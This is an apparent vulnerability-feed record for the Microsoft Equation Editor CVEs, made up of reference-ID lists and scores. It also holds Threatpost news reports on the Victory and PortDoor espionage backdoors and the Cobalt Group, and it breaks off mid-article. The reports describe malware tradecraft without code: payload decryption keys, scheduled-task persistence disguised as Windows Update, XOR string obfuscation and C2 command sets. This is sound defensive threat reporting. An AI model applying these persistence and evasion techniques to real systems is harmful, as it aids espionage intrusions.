"THREATPOST:809BED35A98A53099CE1EC723FA950F2", "THREATPOST:80D12F3888B999E484D206D5EBA9EEA0", "THREATPOST:828471E05035E11C0ED67C67E1EA8F0D", "THREATPOST:848870C5AD3BB637321291CEF571A5F9", "THREATPOST:8549E725CF51C109F7299A0CC5FACBE9", "THREATPOST:856DD01A5D951BB0E39AE06B64DDD2A7", "THREATPOST:85DCC5523A4DCF507633F07B43FE638A", "THREATPOST:85DEC97DDAF4F3EBF731C2724329904B", "THREATPOST:8836AC81C1F2D9654424EC1584E50A16", "THREATPOST:88A5449B2DE22E7A3AD1C820BEDE1109", "THREATPOST:8A24910206DA1810DAD81ABA313E33A7", "THREATPOST:8BA8EF04040D5048287D9AFFAD778130", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:8D91C617AB6DA9813465DF309507F9F5", "THREATPOST:8E01B2E26F588D0FA5B0857DCEF926DA", "THREATPOST:8EC1069E3114E28911EA3438DA21B952", "THREATPOST:8F39618B0CB625A1C4FC439D0A7C4EB9", "THREATPOST:8FAA8C7C7378C070F0011A0B44C03726", "THREATPOST:8FACBD9A4509F71E19E07BB451FD68A0", "THREATPOST:90355E85731E1618F6C63A58CD426966", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:945830C59DF62627CC3D29C4F9E9139F", "THREATPOST:945A12FF5F8B6420706F2E174B6D0590", "THREATPOST:95C6723464FA4BDF541640AC24DD5E35", "THREATPOST:967CD2B765C5CD02EC0568E4797AF842", "THREATPOST:96B85F971B8102B581B91984548004F2", "THREATPOST:96C5FAF7B7238F498D3BFD523344AA56", "THREATPOST:9758835CBD1761636E1E39F36A79936B", "THREATPOST:9812AA10EEA208EA87CD37C5F28D927F", "THREATPOST:985009AC9680D632153D78707A8949EF", "THREATPOST:98BE42759F35CD829E6BD3FAC7D5D1D5", "THREATPOST:9A9D21304DF605E55290BEAB2BDF62C5", "THREATPOST:9AA382E93ED0C2124DD69CF4DDC84EB7", "THREATPOST:9AE8698D8AABA0F11676A29CECC6D7BA", "THREATPOST:9B11E0EF22481CA407924C58E8C7F8C1", "THREATPOST:9B936E81D7DD33C962D98A85BAF3B7FE", "THREATPOST:9C03EBE552C67EF6E62604A81CF13C1A", "THREATPOST:9C0FA678FF748B08478CA83EAAEF83B4", "THREATPOST:9D048A14622014274EB5C5D19FEDD46A", "THREATPOST:9DAD31CF008CF12C5C4A4EA19C77BB66", "THREATPOST:9E1DE5C0DB7F1D8747AD52E14E4C8387", "THREATPOST:9FE968913EDA58B2C622DFD4433C05E0", "THREATPOST:A054939E56572665B8DD31C2FF1D6A79", "THREATPOST:A0EA2808DE56569B593A4E0254EC09CD", "THREATPOST:A1A03F8D19A1212209F2765F29BE892C", "THREATPOST:A21BD1B60411A9861212745052E23AE7", "THREATPOST:A29172A6F4C253F7A464F05CCE4E3ABB", "THREATPOST:A2C4DFB7FD998E1990946FBDE70D8050", "THREATPOST:A2FCDF5F534EC09A258F3193FDEA41A8", "THREATPOST:A3218B82F449C5905D1957A1C264C1C1", "THREATPOST:A45F038EA4091EC6AC414522EC7B04B6", "THREATPOST:A60A7647981BC9789CAECE6E9BADD30E", "THREATPOST:A653527FBB893B6568AF6B264422BD7A", "THREATPOST:A6CEBF30D4D0B3B54DC8E78CC21EBA4B", "THREATPOST:A7710EFC5AA842A252861C862A3F8318", "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:A7D014F320A68BD2D7BEA7FCB9349FC0", "THREATPOST:A824AE46654142C5CE71C8DDFD90D548", "THREATPOST:A844D1411E7339911EECDDBD5596A9E7", "THREATPOST:A959F2AFFE1161A65066EACCFB0D5FCA", "THREATPOST:A9E6DBBE61D0494D0B0C83151FEC45D0", "THREATPOST:A9EF092F5BA25CAD6C775AAE60BC318E", "THREATPOST:A9FAA9D15FCD97151072CF8CE16A42D9", "THREATPOST:AA7C9EFD06F74FBC5580C0384A39AA56", "THREATPOST:AB80E18E0D0B4D9D91D9BF01EFBE3AC6", "THREATPOST:ABA04F8289071D7B10CAE4202D0EB18E", "THREATPOST:AC7105820BB83340E9C002EE77D4B8D6", "THREATPOST:AD20F9744EB0E2E4D282F681451B4FBD", "THREATPOST:AD3C2C361C6E263CA6B217D740D6C09F", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:AD96628DA2614402CC9BDEF93704870B", "THREATPOST:AE4AEC18802953FE366542717C056064", "THREATPOST:AE6ADD184BCB4B6C0DCF53BEE513E9DD", "THREATPOST:AFCEAC73B5337D8E7C237914CF84FC01", "THREATPOST:B051AFA0F0705404F1CD22704980AE7F", "THREATPOST:B1F3641CBE3AF60ECA85E3ADE7AE53CA", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:B34044D3D29EE756187C0D5CDF2E19B8", "THREATPOST:B3C0097CBA4C334709D99BB9D477A6DD", "THREATPOST:B450AFC35B78A62F536227C18B77CB4E", "THREATPOST:B4579714760429B9531FF0E79E44C578", "THREATPOST:B4AED814955E51C42BAE9BF0A3A014B0", "THREATPOST:B4B23ADD1522DC53A0B05300F439AB03", "THREATPOST:B5B59F74FDFACADB44DBF4AE420E3189", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:B62AA49BBB410F8D7406ABE4E3C4C62F", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:B71BC1DE86D81D6B48969567186B0622", "THREATPOST:B7280795B2A42655BE9618D06EB9520A", "THREATPOST:B7E1238E416DAB5F50EED6E4CC347296", "THREATPOST:B8B49658F96D885BA4DC80406A2A94B3", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:BB432D74FB2DC755C74CBEE5CF71B1E9", "THREATPOST:BB95F65906A69148A31A208D15B5EFC3", "THREATPOST:BD9CDF08D7870033C1C564691CABFC16", "THREATPOST:BDA1752A66AD0D3CF8AB59CFB7A8F472", "THREATPOST:BDAFE3A8671CEAB24C02FF18A8FBA60F", "THREATPOST:BDE4A24DFC0713FBC25AB0F17931717C", "THREATPOST:BE68C6E4335F8D5EEAEFCE1E8553C4C8", "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "THREATPOST:C1850156F9F2124BACDC7601CCFA6B30", "THREATPOST:C35731BF3D4A3F8D0B1A838FAD1A8832", "THREATPOST:C442C6ABA3916CAA62C89BC2CB6332CD", "THREATPOST:C47E4314F4EEB30F0139DF3BC8B47E01", "THREATPOST:C4DD63E36CE4313386CAB54222BDD07A", "THREATPOST:C56525805A371C56B68CE54AB4EDB9AF", "THREATPOST:C5D967CF7CFD8422FD9ACFC1CF7277A6", "THREATPOST:C8BB08507CBCCE4C217C33C15D3AA04D", "THREATPOST:C9B3ABEF738D9A1E524FB94613BA5CBA", "THREATPOST:C9C5B1554A6F4216A73108C0748E16EF", "THREATPOST:CB62075A4B035B08FDA602FF702FBB71", "THREATPOST:CC82779FBE47FD3E64708FE6233C3DAD", "THREATPOST:CDCABD1108763209B391D5B81AE03CF7", "THREATPOST:CDDC2C11CF6377AB44508254B9FB36DA", "THREATPOST:D053D0BAA76AC62C5AFCB77CBFD61B6D", "THREATPOST:D11D4E32822220251B14068F9BAAD17E", "THREATPOST:D292185F5E299FDB7366DDAA750D6070", "THREATPOST:D3F6B40A3A2EF494FE7F0AFC7768F7CD", "THREATPOST:D40D286C87360AFDC61FCD9AD506D78F", "THREATPOST:D49075D6FFF077A542015B7F806F4E27", "THREATPOST:D4C8CD7D146990740B8339D88A3FDB84", "THREATPOST:D55054CEF7EC85590BCAC2F18EED6FFC", "THREATPOST:D587192A5DA9FB1680FF9D453F96B972", "THREATPOST:D58796CB8261B361ADF389131F955AE3", "THREATPOST:D5CE687F92766745C002851DFA8945DE", "THREATPOST:D6D859A31F73B00E9B6F642D4C89B344", "THREATPOST:D8172FCB461F5843B3391B2336A4D02F", "THREATPOST:D8CDE16C2F1722831D3106563D1F1551", "THREATPOST:D9C08A737D3D95BFF6B07A04C9479C6D", "THREATPOST:DC3489917B7B9C6C1824FB61C05E82CD", "THREATPOST:DC91E1B2D30C1A0D1ED78420E79DCE86", "THREATPOST:DCEC8DA2CC98CD3F9DF8B10773BD6F01", "THREATPOST:DD69574508B1751B9C9B01C26AE809C1", "THREATPOST:DD7A2F272ACFDE71B0A0CEC234C35876", "THREATPOST:DDDE126E49EC98A6A15655F564E25620", "THREATPOST:DEDA9E6DCA21010A215B158BFF80253C", "THREATPOST:DF45F7CBB6E670440E0A14E517EA753D", "THREATPOST:DF54323828EEC1DDCE4B2312AC6F085F", "THREATPOST:E067CFBFA163616683563A8ED34648FE", "THREATPOST:E068C231265847BA99669A8EBF0D395D", "THREATPOST:E22E26BB31C17ACCC98C59076AF88CD7", "THREATPOST:E46805A1822D16B4725517D4B8786F57", "THREATPOST:E4FBCA31AB2D69F0292283738E873960", "THREATPOST:E539817E8025A93279C63158F37F2DFB", "THREATPOST:E65917E5AE555B95E6FFBD69E00E682D", "THREATPOST:E6DC1F407BA6CEE26FE38C95EBB10D7A", "THREATPOST:E77302403616F2E9A6C7DA2AD2B1F880", "THREATPOST:E7C5C8276111C637456F053327590E4C", "THREATPOST:E937B281CB0B5D1061AAD253FA4ACB53", "THREATPOST:EC55500DAF9E1467C9C94C82758F810C", "THREATPOST:ED7B090DD1289553529F8B6FD87BF467", "THREATPOST:EE14785AC189E016FD2CE51464D3643D", "THREATPOST:EE5FF4DE95B4AED68C90DCB6444B6560", "THREATPOST:EF7DCA1CE0B1A1B1D93B4E4F7A3A3163", "THREATPOST:EF898143DB86CE46FFBDC81DCD8E79AA", "THREATPOST:EFE8A853C0EEF9ED023CC92349BE9410", "THREATPOST:F158248C80174DD4B29AE26B4B4139C0", "THREATPOST:F19F70E263B2C3D2A16C72D12F9884FC", "THREATPOST:F1E0D1BF5C51CAA730D94DB196D962D1", "THREATPOST:F261FA3F1DECA361A6DBC169065B1101", "THREATPOST:F28846A403C73C488A77B766A21BB3E5", "THREATPOST:F2BB55148C9EC48C94C05B4B2CBBBC1A", "THREATPOST:F514D796FE42C0629BD951D8664A2420", "THREATPOST:F61F8A6168C36EAB1584BC8044080B35", "THREATPOST:F68D705DC9A7663E4BF22574470F51D7", "THREATPOST:F701F7503777655BB413FCBEFB88C8DE", "THREATPOST:F73CA4042B0D13ED4A29DED46F90E099", "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B", "THREATPOST:F9FEB3F0862AAD4CC618F9737F44FA7B", "THREATPOST:FAE0DDDC6420E9881C1D719E13B77095", "THREATPOST:FB6C6CE8F3B4AE6846C8AB866C36F024", "THREATPOST:FBDE9552D48B698542D65DEA64890566", "THREATPOST:FBF1F4B1FB26C8B1E95965E920F985EF", "THREATPOST:FCB99D1A395F7D2D1BFD9F698321FA04", "THREATPOST:FCF1B008BD9B10ADDA0703FDB9CBAA04", "THREATPOST:FD699B5CBB882E8FB3DDF3341B557D27", "THREATPOST:FEAE151B1861BE9EF40E606D5434AE00", "THREATPOST:FFB8302BEBD76DDACC5FD08D3FF8F883"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1FEAB54A2EB3929007298481113A7219", "TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03", "TRENDMICROBLOG:6A0454A8A4891A1004496709868EC034"]}, {"type": "zdt", "idList": ["1337DAY-ID-29022", "1337DAY-ID-29119"]}]}, "score": {"value": -0.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:E0EA1F343D1E082C73087FC784C141BD"]}, {"type": "cert", "idList": ["VU:421280"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-0018", "CPAI-2019-0847"]}, {"type": "cve", "idList": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802"]}, {"type": "exploitdb", "idList": ["EDB-ID:43163"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:DFB2E04F89F872DFEF75605BCC9072DB"]}, {"type": "fireeye", "idList": ["FIREEYE:78657FD52E5CBE87FE2D0019439691A0", "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394"]}, {"type": "kaspersky", "idList": ["KLA11139", "KLA11170"]}, {"type": "krebs", "idList": ["KREBS:4F19DF7091060B198B092ABE2F7E1AA8"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882"]}, {"type": "mscve", "idList": ["MS:CVE-2017-11882", "MS:CVE-2018-0798", "MS:CVE-2018-0802"]}, {"type": "mskb", "idList": ["KB2553204", "KB3162047", "KB4011262", "KB4011604", "KB4011618", "KB4011643"]}, {"type": "mssecure", "idList": ["MSSECURE:DF21D5BD34E334683F0DCC4F64FDC83E"]}, {"type": "myhack58", "idList": ["MYHACK58:62201891024", "MYHACK58:62201892253"]}, {"type": "nessus", "idList": ["SMB_NT_MS18_JAN_OFFICE.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310812083", "OPENVAS:1361412562310812148", "OPENVAS:1361412562310812202", "OPENVAS:1361412562310812209", "OPENVAS:1361412562310812607", "OPENVAS:1361412562310812614", "OPENVAS:1361412562310812618", "OPENVAS:1361412562310812623", "OPENVAS:1361412562310812624", "OPENVAS:1361412562310812708", "OPENVAS:1361412562310812711"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145226"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:97274435F9F49556ED060635FD9081E2"]}, {"type": "securelist", "idList": ["SECURELIST:1670EF82924C5F24DC777CBD3BA4AE5E", "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "SECURELIST:652E2EF2009E38562770BCAC629BEA2E", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4"]}, {"type": "symantec", "idList": ["SMNTC-102370"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A69C35FFFCE6FA744216C7784C7D2148", "TALOSBLOG:EC1B279A70AF41A51CBB4EB4722EFA46"]}, {"type": "thn", "idList": ["THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2", "THN:C21D17F1D92C12B031AB9C761BBD004A", "THN:C473C49BA4C68CD048FB1E0B4A2D04F4", "THN:CBEFDC179819629DFFC0C17341BFD3E8", "THN:ED087560040A02BCB1F68DE406A7F577"]}, {"type": "threatpost", "idList": ["THREATPOST:26EDD0A7C1914DBF0CFE32B0877BE5A7", "THREATPOST:43B03902EBB289EABEA3B61E32BF7B7B", "THREATPOST:45A8572FB3BCE9303EDEE2A4783994E3", "THREATPOST:483C67752109A3C6AF1920AEA0F63B4C", "THREATPOST:4A51D32AF6E154B536858044A8667E45", "THREATPOST:63188D8C89FE469962D4F460E46755BC", "THREATPOST:6456A6FCBD57F31DF6ECF8310230973D", "THREATPOST:742E793D712CB6B2F049DBEA5373016E", "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:AB80E18E0D0B4D9D91D9BF01EFBE3AC6", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:B4579714760429B9531FF0E79E44C578", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "THREATPOST:F2BB55148C9EC48C94C05B4B2CBBBC1A", "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03", "TRENDMICROBLOG:6A0454A8A4891A1004496709868EC034"]}, {"type": "zdt", "idList": ["1337DAY-ID-29022", "1337DAY-ID-29119"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2017-11882", "epss": "0.974500000", "percentile": "0.998980000", "modified": "2023-03-16"}, {"cve": "CVE-2018-0798", "epss": "0.970080000", "percentile": "0.995390000", "modified": "2023-03-17"}, {"cve": "CVE-2018-0802", "epss": "0.974870000", "percentile": "0.999420000", "modified": "2023-03-16"}], "vulnersScore": -0.1}, "_state": {"dependencies": 1660032824, "score": 1684007085, "epss": 1679070268}, "_internal": {"score_hash": "a24f44ce104fed0cdbab01397cdba896"}}

{"threatpost": [{"lastseen": "2021-06-07T19:08:25", "description": "An ongoing surveillance operation has been uncovered that targets a Southeast Asian government, researchers said \u2013 using a previously unknown espionage malware.\n\nAccording to Check Point Research, the attack involves spear-phishing emails with malicious Word documents to gain initial access, along with the exploitation of older, known Microsoft Office security vulnerabilities. But most notable, researchers said, is the novel backdoor, which they said has been in development by a Chinese APT for at least three years.\n\nThe documents were \u201csent to different employees of a government entity in Southeast Asia,\u201d according to [the Check Point analysis](<https://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/>). \u201cIn some cases, the emails are spoofed to look like they were from other government-related entities. The attachments to these emails are weaponized copies of legitimate looking official documents and use the remote template technique to pull the next stage from the attacker\u2019s server.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe malicious documents download a template from various URLs, according to the analysis, which are .RTF files embedded with the [RoyalRoad weaponizer](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>), also known as the 8.t Dropper/RTF exploit builder. RoyalRoad is a tool that researchers have said is [part of the arsenal of several Chinese APTs](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>), such as Tick, Tonto Team and TA428; it generates weaponized RTF documents that exploit vulnerabilities in Microsoft\u2019s [Equation Editor](<https://threatpost.com/threatlist-microsoft-macros-remain-top-vector-for-malware-delivery/137428/>) (CVE-2017-11882, CVE-2018-0798 and CVE-2018-0802).\n\nThe RoyalRoad-generated RTF document contains an encrypted payload and shellcode, according to the analysis.\n\n\u201cTo decrypt the payload from the package, the attacker uses the RC4 algorithm with the key 123456, and the resulted DLL file is saved as 5.t in the %Temp% folder,\u201d researchers said. \u201cThe shellcode is also responsible for the persistence mechanism \u2013 it creates the scheduled task named Windows Update that should run the exported function StartW from 5.t with rundll32.exe, once a day.\u201d\n\nThe .DLL gathers data on the victim\u2019s computer including the OS name and version, user name, MAC addresses of networking adapters and antivirus information. All of the data is encrypted and then sent to the attackers\u2019 command-and-control server (C2) via [GET HTTP request method](<https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/GET>). After that, a multi-stage chain eventually results in the installation of the backdoor module, which is called \u201cVictory.\u201d It \u201cappears to be a custom and unique malware,\u201d according to Check Point.\n\n## **Victory Backdoor**\n\nThe malware is built to steal information and provide consistent access to the victim. Check Point researchers said it can take screenshots, manipulate files (including creating, deleting, renaming and reading them), gather information on the top-level windows that are open, and shut down the computer.\n\nInterestingly, the malware appears to be related to previously developed tools.\n\n\u201cSearching for files similar to the final backdoor in the wild, we encountered a set of files that were submitted to VirusTotal in 2018,\u201d according to the analysis. \u201cThe files were named by the author as MClient and appear to be part of a project internally called SharpM, according to their PDB paths. Compilation timestamps also show a similar timeframe between July 2017 and June 2018, and upon examination of the files, they were found to be older test versions of our VictoryDll backdoor and its loaders chain.\u201d\n\nThe specific implementation of the main backdoor functionality is identical; and, the connection method has the same format, according to the firm. Also, MClient\u2019s connection XOR key and VictoryDll\u2019s initial XOR key are the same.\n\nHowever, there are differences between the two in terms of architecture, functionality and naming conventions. For instance, MClient features a keylogger, which is absent for Victory. And, Victory\u2019s exported function is named MainThread, while in all versions of the MClient variant the export function was named GetCPUID, according to Check Point.\n\n\u201cOverall, we can see that in these three years, most of the functionality of MClient and AutoStartup_DLL was preserved and split between multiple components \u2013 probably to complicate the analysis and decrease the detection rates at each stage,\u201d the form said. \u201cWe may also assume that there exist other modules based on the code from 2018 that might be installed by the attacker in the later stages of the attack.\u201d\n\n## **Attribution**\n\nCheck Point has attributed the campaign to a Chinese APT. One of the clues is that the first-stage C2 servers are hosted by two different cloud services, located in Hong Kong and Malaysia. These are active in only a limited daily window, returning payloads only from 01:00 \u2013 08:00 UTC Monday through Friday, which corresponds with the Chinese workday. Also, Check Point said that the servers went dormant in the period between May 1 and 5 \u2013 which China\u2019s Labor Day holidays.\n\nOn top of that, the RoyalRoad RTF exploit building kit is a tool of choice among Chinese APT groups; and some test versions of the backdoor contained internet connectivity check with www.baidu.com \u2013 a popular Chinese website.\n\n\u201cWe unveiled the latest activity of what seems to be a long-running Chinese operation that managed to stay under the radar for more than three years,\u201d Check Point concluded. \u201cIn this campaign, the attackers utilized the set of Microsoft Office exploits and loaders with anti-analysis and anti-debugging techniques to install a previously unknown backdoor.\u201d\n\n**Join Threatpost for \u201cA Walk On The Dark Side: A Pipeline Cyber Crisis Simulation\u201d\u2013 a LIVE interactive demo on **[**Wed, June 9 at 2:00 PM EDT**](<https://threatpost.com/webinars/take-a-walk-on-the-darkside/?utm_source=ART&utm_medium=ART&utm_campaign=June_ImmersiveLabs_Webinar>)**. Sponsored by Immersive Labs, find out whether you have the tools and skills to prevent a Colonial Pipeline-style attack on your organization. Questions and LIVE audience participation encouraged. Join the discussion and **[**Register HERE**](<https://threatpost.com/webinars/take-a-walk-on-the-darkside/?utm_source=ART&utm_medium=ART&utm_campaign=June_ImmersiveLabs_Webinar>)** for free.**\n", "cvss3": {}, "published": "2021-06-07T18:49:44", "type": "threatpost", "title": "Novel 'Victory' Backdoor Spotted in Chinese APT Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-06-07T18:49:44", "id": "THREATPOST:616358A88F9C1E69920585FDC717CF1F", "href": "https://threatpost.com/victory-backdoor-apt-campaign/166700/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-30T19:38:25", "description": "A previously undocumented backdoor malware, dubbed PortDoor, is being used by a probable Chinese advanced persistent threat actor (APT) to target the Russian defense sector, according to researchers.\n\nThe Cybereason Nocturnus Team observed the cybercriminals specifically going after the Rubin Design Bureau, which designs submarines for the Russian Federation\u2019s Navy. The initial target of the attack was a general director there named Igor Vladimirovich, researchers said, who received a phishing email.\n\n[![zoho webinar promo](https://media.threatpost.com/wp-content/uploads/sites/103/2021/04/29074106/Zoho_Webinar_Promo.png)](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nThe attack began with the [RoyalRoad weaponizer](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>), also known as the 8.t Dropper/RTF exploit builder \u2013 a tool that Cybereason said is [part of the arsenal of several Chinese APTs](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>), such as Tick, Tonto Team and TA428. RoyalRoad generates weaponized RTF documents that exploit vulnerabilities in Microsoft\u2019s [Equation Editor](<https://threatpost.com/threatlist-microsoft-macros-remain-top-vector-for-malware-delivery/137428/>) (CVE-2017-11882, CVE-2018-0798 and CVE-2018-0802).\n\nThe use of RoyalRoad is one of the reasons the company believes Chinese cybercriminals to be behind the attack.\n\n\u201cThe accumulated evidence, such as the infection vector, social-engineering style, use of RoyalRoad against similar targets, and other similarities between the newly discovered backdoor sample and other known Chinese APT malware, all bear the hallmarks of a threat actor operating on behalf of Chinese state-sponsored interests,\u201d according to a [Cybereason analysis](<https://www.cybereason.com/blog/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector>), published Friday.\n\n## **A Quiet Espionage Malware**\n\nThe RoyalRoad tool was seen fetching the unique PortDoor sample once the malicious RTF document is opened, which researchers said was designed with stealth in mind. It has multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation, static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration and more.\n\nOnce executed, the backdoor decrypts the strings using a hardcoded 0xfe XOR key in order to retrieve its configuration information. This includes the command-and-control (C2) server address, a victim identifier and some other minor information.\n\nThe malware then creates an additional file in %temp% with the hardcoded name \u201c58097616.tmp\u201d and writes the GetTickCount value multiplied by a random number to it: \u201cThis can be used as an additional identifier for the target, and also as a placeholder for the previous presence of this malware,\u201d researchers explained.\n\nAfter that, it establishes its C2 connection, which facilitates the transfer of data using TCP over raw sockets, or via HTTPS \u2013 with proxy support. At this point, Cybereason said that PortDoor also has the ability to achieve privilege escalation by stealing explorer.exe tokens.\n\nThen, the malware gathers basic PC info to be sent to the C2, which it bundles with a unique identifier, after which is awaits further instructions.\n\nThe C2 commands are myriad:\n\n * List running processes\n * Open process\n * Get free space in logical drives\n * Files enumeration\n * Delete file\n * Move file\n * Create process with a hidden window\n * Open file for simultaneous operations\n * Write to file\n * Close handle\n * Open file and write directly to disk\n * Look for the \u201cKr*^j4\u201d string\n * Create pipe, copy data from it and AES encrypt\n * Write data to file, append with \u201c\\n\u201d\n * Write data to file, append with \u201cexit\\n\u201d\n\nPortDoor also employs an anti-analysis technique known as dynamic API resolving, according to the analysis.\n\n\u201cThe backdoor is able to hide most of its main functionality and avoid static detection of suspicious API calls by dynamically resolving its API calls instead of using static imports,\u201d researchers explained.\n\n## **Chinese APTs in the Cyberattack Mix \u2013 Probably**\n\nCybereason\u2019s analysis did not yield up a specific Chinese APT actor who would likely be responsible for the attack. However, the researchers said they could make some educated guesses.\n\n\u201cThere are a couple of known Chinese APT groups that share quite a few similarities with the threat actor behind the new malware samples analyzed,\u201d according to the report.\n\nFor instance, the RTF file used in the attack was weaponized with RoyalRoad v7, which was previously observed being used by the Tonto Team, TA428 and Rancor APTs.\n\n\u201cBoth the Tonto Team and TA428 threat actors have been observed attacking Russian organizations in the past, and more specifically attacking research and defense-related targets,\u201d according to the analysis. \u201cWhen comparing the spear-phishing email and malicious documents in these attacks with previously examined phishing emails and lure documents used by the Tonto Team to attack Russian organizations, there are certain similarities in the linguistic and visual style used by the attackers in the phishing emails and documents.\u201d\n\nThat said, the PortDoor malware doesn\u2019t share significant code similarities with previously known malware used by those groups \u2013 leading Cybereason to conclude that it is not a variant of a known malware, which makes it useless in attribution efforts.\n\n\u201cLastly, we are also aware that there could be other groups, known or yet unknown, that could be behind the attack and the development of the PortDoor backdoor,\u201d researchers concluded. \u201cWe hope that as time goes by, and with more evidence gathered, the attribution could be more concrete.\u201d\n\n**Download our exclusive FREE Threatpost Insider eBook,** **_\u201c[2021: The Evolution of Ransomware](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>),\u201d_**** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. Get the whole story and [DOWNLOAD](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>) the eBook now \u2013 on us!**\n\n_ _\n", "cvss3": {}, "published": "2021-04-30T19:32:34", "type": "threatpost", "title": "PortDoor Espionage Malware Takes Aim at Russian Defense Sector", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-04-30T19:32:34", "id": "THREATPOST:9AE8698D8AABA0F11676A29CECC6D7BA", "href": "https://threatpost.com/portdoor-espionage-malware-takes-aim-at-russian-defense-sector/165770/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T05:52:39", "description": "Evidence has surfaced that the Cobalt Group \u2013 the threat actors behind widespread attacks on banks and ATM jackpotting campaigns across Europe \u2013 is continuing to operate, despite the arrest of its accused ringleader in March.\n\nThe Cobalt Group, first burst on the scene in 2016: in a single night, the group stole the equivalent of over $32,000 (in local currency) from six ATMs in Eastern Europe. Throughout 2017 the group expanded its focus to financial-sector phishing schemes and new regions, including North and South America, as well as Western Europe. researchers estimated that in the first six months of 2017 Cobalt sent phishing messages with malicious attachments to over 3,000 users at 250 companies in 13 countries.\n\nIn a report [released last week](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) (PDF) by Positive Technologies, researchers there said in mid-May 2018 they detected a phishing campaign directed at the financial sector that has an ultimate goal of downloading a JavaScript backdoor on target\u2019s computers. Researchers discovered the backdoor to be loaded up with malevolent functions, including cyberespionage and the ability to launch programs, along with the ability to update itself, remove itself and detect antivirus software. It also encrypts its communications with the C2 server with RC4. In all, it\u2019s capabilities mirror the backdoor that Cobalt Group has been known to employ in the past, researchers said.\n\n\u201cAlthough [Positive Technologies] specialists did not detect use of the Cobalt Strike tool which gave the group its name, the techniques and tactics are strongly suggestive of the group\u2019s previous attacks,\u201d they noted.\n\nCobalt typically employs a number of techniques to evade user scrutiny and spam filters. The group hacks weakly protected public sites, which it uses to host malware. It sends fake messages that appear to come from financial regulators and company partners, and targets both work and personal addresses of employees. In most cases, the goal of phishing messages is to compromise bank systems used for ATM management. This enables infecting ATMs with malware that takes control of the cash dispenser. During the final stage of the attack, money mules collect cash from the hacked ATMs.\n\nThe new May campaign bore all of the hallmarks of the group beyond just the payload. For one, the phony messages were sent from a 